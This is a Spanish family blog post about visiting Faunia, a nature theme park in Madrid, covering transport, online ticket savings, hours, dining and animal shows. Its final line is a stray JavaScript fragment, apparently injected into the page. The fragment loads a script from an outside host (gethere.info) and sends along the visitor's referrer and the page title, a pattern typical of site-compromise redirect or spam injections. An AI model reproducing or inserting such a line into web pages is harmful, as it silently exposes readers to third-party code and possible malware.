Planes con niños: Faunia

03/10/2014

Faunia

Aquí os traemos otra de nuestras entregas de planes familiares en Madrid. Este parque temático de la naturaleza no se podía quedar atrás. Faunia no es un zoo cualquiera. Su encanto reside en esa diferencia que mantiene respecto a los zoos de toda la vida (y te aseguro que conquista desde al más grande de la familia hasta al más pequeño). Empecemos con su localización: está situado en el extrarradio de Madrid, en el barrio de Valdebernardo, Vicálvaro. Puedes llegar hasta allí de tres maneras: en coche propio -en la web del parque vienen las indicaciones con coordenadas incluídas-, en autobús -el número 71 de la EMT te deja en la puerta del parque- o en metro o en cercanías -debido a la distancia que existe entre la boca de metro y la entrada al parque, más de 10 minutos andando, esta es la opción que menos os recomendamos-.

Sigamos con otro punto bien importante: los precios. Ya os adelantamos que la diferencia que hay entre adquirir las entradas en la taquilla del parque el mismo día o adquirirlas con antelación de manera on line, es realmente notoria. Si te organizas y las compras a través de la web con antelación te podrás ahorrar un pellizquito además de no tener que hacer colas ese día. La previa organización, merece la pena. Si decides hacerlo de manera on line, no te olvides de, o bien imprimir las entradas, o bien, descargárte los códigos QR.

¿Y qué hay de los horarios? ¿Abre durante todo el año? En principio sí, solo que la hora de cierre variará en función de la época del año en la que estemos. No obstante, consulta previamente el calendario disponible en la web, y así saldrás de dudas 🙂

Hora de la comida. Para comer tienes disponibles puntos de comida rápida por todo el parque. Además, a la entrada del parque hay un restaurante bien grande de autoservicio pensado para toda la familia. Existen menús de todo tipo, y a los niños les encantará el menú infantil.

Bueno, después de todos estos datos, queda tal vez lo más importante, ¿no? ¿Con qué me voy a encontrar en Faunia? Pues verás desde cocodrilos o pingüinos en su hábitat natural hasta espectáculos de aves o leones marinos. Además podrás interactuar con burros, conejos, cerdos y un largo etcétera o incluso darle de comer en una pradera a una especie de ardillitas ¿Apetecible, eh?

Pues venga, pongamos día y escapémonos a Faunia 🙂

Foto | Zona Retiro

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;